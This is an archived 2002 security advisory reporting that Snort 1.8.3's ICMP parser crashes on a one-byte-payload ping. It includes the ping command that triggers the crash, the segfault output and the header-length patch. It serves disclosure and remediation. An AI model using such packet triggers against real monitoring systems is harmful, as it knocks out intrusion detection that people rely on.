TUCoPS :: Unix :: General :: unix4993.htm

Snort IDS is succeptible to DoS (maybe exploitable remote buffer overflow)
11th Jan 2002 [SBWID-4993]
COMMAND

	Snort IDS  is  succeptible  to  DoS  (maybe  exploitable  remote  buffer
	overflow)

SYSTEMS AFFECTED

	Snort 1.8.3 and probably earlier

PROBLEM

	Per \"Sinbad\" report, snort ICMP parser is doomed ...
	

	Example :
	 

	 # snort -dev host 192.168.0.3 and 192.168.0.1 

	 

	 Ping 192.168.0.1 from 192.168.0.3 within one data in payload:

	 # ping -c 1 -s 1 192.168.0.1

	 

	 Snort\'s output showed below:

	 -*> Snort! <*-

	 Version 1.8.3 (Build 88)

	 By Martin Roesch (roesch@sourcefire.com, www.snort.org)

	 01/10-11:34:43.898282 0:80:AD:78:83:BB -> 0:E0:18:C4:52:76 type:0x800 len:0x2B

	 192.168.0.3 -> 192.168.0.1 ICMP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:29 DF

	 Type:8  Code:0  ID:9435   Seq:0  ECHO

	 Segmentation fault (core dumped)

	

SOLUTION

	Following patch has been committed to the Snort 1.8 branch of Snort  CVS
	and is included in build 90.
	

	

	--- olddecode.h Thu Jan 10 15:47:48 2002

	+++ decode.h    Thu Jan 10 12:15:33 2002

	@@ -105,7 +105,7 @@

	 #define IP_HEADER_LEN           20

	 #define TCP_HEADER_LEN          20

	 #define UDP_HEADER_LEN          8

	-#define ICMP_HEADER_LEN         8

	+#define ICMP_HEADER_LEN         4

	 

	 #define TH_FIN  0x01

	 #define TH_SYN  0x02

	

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH